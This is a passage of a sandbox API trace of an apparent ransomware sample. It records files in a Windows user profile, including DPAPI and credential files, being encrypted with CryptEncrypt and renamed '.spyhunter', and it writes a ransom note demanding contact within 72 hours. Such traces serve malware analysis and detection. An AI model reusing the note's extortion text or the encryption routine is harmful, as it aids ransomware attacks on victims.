pbData=0x31f278*, pdwDataLen=0x270eee0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eee0*=0x30) returned 1 [0143.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.511] GetProcessHeap () returned 0x2c0000 [0143.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.511] GetProcessHeap () returned 0x2c0000 [0143.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f65e38 | out: hHeap=0x2c0000) returned 1 [0143.511] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eee8 | out: pbBuffer=0x270eee8) returned 1 [0143.511] GetProcessHeap () returned 0x2c0000 [0143.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.511] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eee0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eee0*=0x30) returned 1 [0143.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.511] GetProcessHeap () returned 0x2c0000 [0143.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.511] GetProcessHeap () returned 0x2c0000 [0143.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fef910 | out: hHeap=0x2c0000) returned 1 [0143.512] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eee0 | out: pbBuffer=0x270eee0) returned 1 [0143.512] GetProcessHeap () returned 0x2c0000 [0143.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.512] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eed8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eed8*=0x30) returned 1 [0143.512] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.512] GetProcessHeap () returned 0x2c0000 [0143.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.512] GetProcessHeap () returned 0x2c0000 [0143.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fef838 | out: hHeap=0x2c0000) returned 1 [0143.512] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eee0 | out: pbBuffer=0x270eee0) returned 1 [0143.512] GetProcessHeap () returned 0x2c0000 [0143.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.512] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eed8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eed8*=0x30) returned 1 [0143.512] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.512] GetProcessHeap () returned 0x2c0000 [0143.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.512] GetProcessHeap () returned 0x2c0000 [0143.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fef760 | out: hHeap=0x2c0000) returned 1 [0143.513] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eed8 | out: pbBuffer=0x270eed8) returned 1 [0143.513] GetProcessHeap () returned 0x2c0000 [0143.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.513] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eed0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eed0*=0x30) returned 1 [0143.513] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.513] GetProcessHeap () returned 0x2c0000 [0143.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.513] GetProcessHeap () returned 0x2c0000 [0143.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef77d8 | out: hHeap=0x2c0000) returned 1 [0143.513] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.513] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.513] WriteFile (in: hFile=0xac, lpBuffer=0x270ee0b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ef34, lpOverlapped=0x0 | out: lpBuffer=0x270ee0b*, lpNumberOfBytesWritten=0x270ef34*=0x127, lpOverlapped=0x0) returned 1 [0143.514] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.514] WriteFile (in: hFile=0xac, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ef34, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ef34*=0x2ac, lpOverlapped=0x0) returned 1 [0143.514] CloseHandle (hObject=0xac) returned 1 [0143.514] GetProcessHeap () returned 0x2c0000 [0143.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fef688 | out: hHeap=0x2c0000) returned 1 [0143.514] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.515] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.515] WriteFile (in: hFile=0xac, lpBuffer=0x270ee07*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ef30, lpOverlapped=0x0 | out: lpBuffer=0x270ee07*, lpNumberOfBytesWritten=0x270ef30*=0x127, lpOverlapped=0x0) returned 1 [0143.520] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.520] WriteFile (in: hFile=0xac, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ef30, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ef30*=0x2ac, lpOverlapped=0x0) returned 1 [0143.520] CloseHandle (hObject=0xac) returned 1 [0143.520] GetProcessHeap () returned 0x2c0000 [0143.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cfe0 | out: hHeap=0x2c0000) returned 1 [0143.520] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eed0 | out: pbBuffer=0x270eed0) returned 1 [0143.520] GetProcessHeap () returned 0x2c0000 [0143.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.520] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eec8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eec8*=0x30) returned 1 [0143.521] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.521] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 110 [0143.521] StrStrW (lpFirst="Preferred", lpSrch=".txt") returned 0x0 [0143.521] GetProcessHeap () returned 0x2c0000 [0143.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0143.521] ReadFile (in: hFile=0xac, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee8c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ee8c*=0x18, lpOverlapped=0x0) returned 1 [0143.522] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.522] WriteFile (in: hFile=0xac, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x270ee8c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ee8c*=0x18, lpOverlapped=0x0) returned 1 [0143.522] GetProcessHeap () returned 0x2c0000 [0143.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0143.522] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.522] WriteFile (in: hFile=0xac, lpBuffer=0x270eecc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee8c, lpOverlapped=0x0 | out: lpBuffer=0x270eecc*, lpNumberOfBytesWritten=0x270ee8c*=0x4, lpOverlapped=0x0) returned 1 [0143.522] WriteFile (in: hFile=0xac, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee8c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee8c*=0x30, lpOverlapped=0x0) returned 1 [0143.522] CloseHandle (hObject=0xac) returned 1 [0143.523] GetProcessHeap () returned 0x2c0000 [0143.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0143.523] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.spyhunter") returned 120 [0143.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.spyhunter" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.spyhunter")) returned 1 [0143.523] GetProcessHeap () returned 0x2c0000 [0143.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0143.523] GetProcessHeap () returned 0x2c0000 [0143.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.523] GetProcessHeap () returned 0x2c0000 [0143.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffb2b0 | out: hHeap=0x2c0000) returned 1 [0143.524] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eec8 | out: pbBuffer=0x270eec8) returned 1 [0143.524] GetProcessHeap () returned 0x2c0000 [0143.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.524] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eec0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eec0*=0x30) returned 1 [0143.524] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.524] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 137 [0143.524] StrStrW (lpFirst="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpSrch=".txt") returned 0x0 [0143.524] GetProcessHeap () returned 0x2c0000 [0143.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0143.524] ReadFile (in: hFile=0xac, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee84, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ee84*=0x1d4, lpOverlapped=0x0) returned 1 [0143.525] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.525] WriteFile (in: hFile=0xac, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x270ee84, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ee84*=0x1d4, lpOverlapped=0x0) returned 1 [0143.525] GetProcessHeap () returned 0x2c0000 [0143.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0143.525] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.525] WriteFile (in: hFile=0xac, lpBuffer=0x270eec4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee84, lpOverlapped=0x0 | out: lpBuffer=0x270eec4*, lpNumberOfBytesWritten=0x270ee84*=0x4, lpOverlapped=0x0) returned 1 [0143.526] WriteFile (in: hFile=0xac, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee84, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee84*=0x30, lpOverlapped=0x0) returned 1 [0143.526] CloseHandle (hObject=0xac) returned 1 [0143.526] GetProcessHeap () returned 0x2c0000 [0143.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0143.526] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.spyhunter") returned 147 [0143.526] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.spyhunter" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.spyhunter")) returned 1 [0143.526] GetProcessHeap () returned 0x2c0000 [0143.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0143.526] GetProcessHeap () returned 0x2c0000 [0143.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.527] GetProcessHeap () returned 0x2c0000 [0143.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff4f88 | out: hHeap=0x2c0000) returned 1 [0143.527] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eec8 | out: pbBuffer=0x270eec8) returned 1 [0143.527] GetProcessHeap () returned 0x2c0000 [0143.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.527] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eec0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eec0*=0x30) returned 1 [0143.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.527] GetProcessHeap () returned 0x2c0000 [0143.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.527] GetProcessHeap () returned 0x2c0000 [0143.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f69d98 | out: hHeap=0x2c0000) returned 1 [0143.527] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eec0 | out: pbBuffer=0x270eec0) returned 1 [0143.527] GetProcessHeap () returned 0x2c0000 [0143.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.527] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eeb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eeb8*=0x30) returned 1 [0143.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.528] GetProcessHeap () returned 0x2c0000 [0143.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.528] GetProcessHeap () returned 0x2c0000 [0143.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f69c80 | out: hHeap=0x2c0000) returned 1 [0143.528] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eec0 | out: pbBuffer=0x270eec0) returned 1 [0143.528] GetProcessHeap () returned 0x2c0000 [0143.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.528] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eeb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eeb8*=0x30) returned 1 [0143.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.528] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 63 [0143.528] StrStrW (lpFirst="CREDHIST", lpSrch=".txt") returned 0x0 [0143.528] GetProcessHeap () returned 0x2c0000 [0143.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0143.528] ReadFile (in: hFile=0xac, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee7c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ee7c*=0x18, lpOverlapped=0x0) returned 1 [0143.529] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.529] WriteFile (in: hFile=0xac, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x270ee7c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ee7c*=0x18, lpOverlapped=0x0) returned 1 [0143.530] GetProcessHeap () returned 0x2c0000 [0143.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0143.530] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.530] WriteFile (in: hFile=0xac, lpBuffer=0x270eebc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee7c, lpOverlapped=0x0 | out: lpBuffer=0x270eebc*, lpNumberOfBytesWritten=0x270ee7c*=0x4, lpOverlapped=0x0) returned 1 [0143.530] WriteFile (in: hFile=0xac, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee7c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee7c*=0x30, lpOverlapped=0x0) returned 1 [0143.530] CloseHandle (hObject=0xac) returned 1 [0143.530] GetProcessHeap () returned 0x2c0000 [0143.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0143.530] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.spyhunter") returned 73 [0143.530] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.spyhunter" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist.spyhunter")) returned 1 [0143.647] GetProcessHeap () returned 0x2c0000 [0143.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0143.647] GetProcessHeap () returned 0x2c0000 [0143.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 